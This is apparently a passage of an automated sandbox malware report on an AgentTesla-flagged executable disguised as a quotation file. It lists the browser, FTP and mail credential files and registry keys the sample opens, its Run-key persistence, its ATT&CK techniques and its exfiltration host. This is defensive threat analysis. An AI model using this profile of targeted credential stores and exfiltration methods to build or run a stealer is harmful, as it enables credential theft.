                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\QUOTATIONS#08670.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 9.2.newapp.exe.3cc54ba.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4345322.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.43823e0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3d02578.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.428e0d2.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3828c62.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.391cf70.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4250ff2.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c4b33a.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c0e26a.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c4b33a.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.QUOTATIONS#08670.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3bd118a.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3d02578.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.42cb1a2.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c0e26a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3865d32.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3828c62.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3865d32.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.428e0d2.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3cc54ba.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.43823e0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.42cb1a2.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4345322.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3bd118a.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4250ff2.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.2575902767.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: QUOTATIONS#08670.exe PID: 7592, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QUOTATIONS#08670.exe PID: 8124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 6576, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 3820, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 9.2.newapp.exe.3cc54ba.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4345322.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.43823e0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3d02578.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.428e0d2.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3828c62.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.391cf70.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4250ff2.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c4b33a.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c0e26a.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c4b33a.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.QUOTATIONS#08670.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3bd118a.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3d02578.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.37ebb82.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3c0e26a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3865d32.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.42cb1a2.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3828c62.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.3865d32.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.428e0d2.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3cc54ba.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.43823e0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.42cb1a2.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4345322.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.newapp.exe.3bd118a.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.newapp.exe.4250ff2.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.391cf70.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATIONS#08670.exe.38dfeb2.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.2575902767.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2575902767.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: QUOTATIONS#08670.exe PID: 7592, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QUOTATIONS#08670.exe PID: 8124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 6576, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: newapp.exe PID: 3820, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Valid Accounts                  		121
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		1
                  Exfiltration Over Alternative Protocol                  		Abuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Valid Accounts                  		1
                  Valid Accounts                  		1
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		24
                  System Information Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  Registry Run Keys / Startup Folder                  		1
                  Access Token Manipulation                  		1
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		211
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook112
                  Process Injection                  		1
                  DLL Side-Loading                  		NTDS2
                  Process Discovery                  		Distributed Component Object Model21
                  Input Capture                  		23
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                  Registry Run Keys / Startup Folder                  		1
                  Masquerading                  		LSA Secrets141
                  Virtualization/Sandbox Evasion                  		SSH1
                  Clipboard Data                  		Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Valid Accounts                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation                  		DCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                  Virtualization/Sandbox Evasion                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                  Process Injection                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Hidden Files and Directories                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524956 Sample: QUOTATIONS#08670.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 30 ftp.ercolina-usa.com 2->30 32 ercolina-usa.com 2->32 34 api.ipify.org 2->34 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 7 other signatures 2->54 7 QUOTATIONS#08670.exe 3 2->7         started        11 newapp.exe 2 2->11         started        13 newapp.exe 2 2->13         started        signatures3 process4 file5 28 C:\Users\user\...\QUOTATIONS#08670.exe.log, ASCII 7->28 dropped 56 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->56 58 Hides that the sample has been downloaded from the Internet (zone.identifier) 7->58 60 Injects a PE file into a foreign processes 7->60 15 QUOTATIONS#08670.exe 16 5 7->15         started        62 Multi AV Scanner detection for dropped file 11->62 64 Machine Learning detection for dropped file 11->64 20 newapp.exe 11->20         started        22 newapp.exe 13->22         started        signatures6 process7 dnsIp8 36 ercolina-usa.com 192.254.225.136, 21, 31841, 45522 UNIFIEDLAYER-AS-1US United States 15->36 38 api.ipify.org 104.26.12.205, 443, 62916 CLOUDFLARENETUS United States 15->38 24 C:\Users\user\AppData\Roaming\...\newapp.exe, PE32 15->24 dropped 26 C:\Users\user\...\newapp.exe:Zone.Identifier, ASCII 15->26 dropped 40 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->40 42 Tries to steal Mail credentials (via file / registry access) 15->42 44 Tries to harvest and steal ftp login credentials 15->44 46 3 other signatures 15->46 file9 signatures10

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  QUOTATIONS#08670.exe24%ReversingLabs
                  QUOTATIONS#08670.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\newapp\newapp.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\newapp\newapp.exe24%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://api.ipify.org/0%URL Reputationsafe
                  https://api.ipify.org0%URL Reputationsafe
                  https://account.dyn.com/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ercolina-usa.com
                  		192.254.225.136
                  		truetrue
                    		unknown
                    api.ipify.org
                    		104.26.12.205
                    		truefalse
                      		unknown
                      ftp.ercolina-usa.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                        • URL Reputation: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://go.microsoft.cnewapp.exe, 00000009.00000002.2570999762.0000000000B37000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://go.microsoft.cinkInewapp.exe, 00000009.00000002.2570999762.0000000000B37000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://api.ipify.orgQUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000004.00000002.2575902767.0000000003061000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://account.dyn.com/QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000038DF000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000000.00000002.2017156067.00000000037AE000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000004.00000002.2570779363.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.0000000004213000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.0000000004345000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000008.00000002.2597502551.000000000413F000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 00000009.00000002.2596669969.0000000003B94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.ipify.org/tQUOTATIONS#08670.exe, 00000004.00000002.2575902767.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTATIONS#08670.exe, 00000004.00000002.2575902767.0000000003061000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://ftp.ercolina-usa.comQUOTATIONS#08670.exe, 00000004.00000002.2575902767.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://ercolina-usa.comQUOTATIONS#08670.exe, 00000004.00000002.2575902767.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, QUOTATIONS#08670.exe, 00000004.00000002.2575902767.000000000314E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://purl.oennewapp.exe, 00000009.00000002.2605752686.0000000005EE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    192.254.225.136
                                    		ercolina-usa.comUnited States
                                    		46606UNIFIEDLAYER-AS-1UStrue
                                    104.26.12.205
                                    		api.ipify.orgUnited States
                                    		13335CLOUDFLARENETUSfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1524956
                                    Start date and time:2024-10-03 14:27:11 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 8m 31s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:13
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:QUOTATIONS#08670.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@9/3@2/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 97%
                                    • Number of executed functions: 203
                                    • Number of non-executed functions: 23
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • VT rate limit hit for: QUOTATIONS#08670.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    08:28:14API Interceptor14680x Sleep call for process: QUOTATIONS#08670.exe modified
                                    08:29:31API Interceptor444x Sleep call for process: newapp.exe modified
                                    14:29:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe
                                    14:29:28AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run newapp C:\Users\user\AppData\Roaming\newapp\newapp.exe

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    192.254.225.136RFQ#003110-Al Nasr.exeGet hashmaliciousAgentTeslaBrowse
                                      TRANEXAMIC ACID & CAMPHANEDIOL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                        F46VBJ6Yvy.exeGet hashmaliciousAgentTeslaBrowse
                                          PO 5002407962.exeGet hashmaliciousAgentTeslaBrowse
                                            0097-CGM CIGIEMME S.p.A.exeGet hashmaliciousAgentTeslaBrowse
                                              SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                CHEMICAL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                                                  QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                    SecuriteInfo.com.Win32.CrypterX-gen.6113.26438.exeGet hashmaliciousAgentTeslaBrowse
                                                      SecuriteInfo.com.Win64.PWSX-gen.371.14469.exeGet hashmaliciousAgentTeslaBrowse
                                                        104.26.12.205file.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                        • api.ipify.org/
                                                        Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                        • api.ipify.org/
                                                        2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                        • api.ipify.org/
                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                        • api.ipify.org/

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        api.ipify.org08(2)_00.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 104.26.13.205
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 104.26.12.205
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 104.26.12.205
                                                        file.exeGet hashmaliciousUnknownBrowse
                                                        • 172.67.74.152
                                                        PO-A1702108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                        • 172.67.74.152
                                                        AvQTFKdsST.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        • 104.26.13.205
                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                        • 104.26.12.205
                                                        z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 104.26.12.205
                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                        • 172.67.74.152

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CLOUDFLARENETUShttps://trello.com/c/HA4sCE32Get hashmaliciousHTMLPhisherBrowse
                                                        • 104.18.36.155
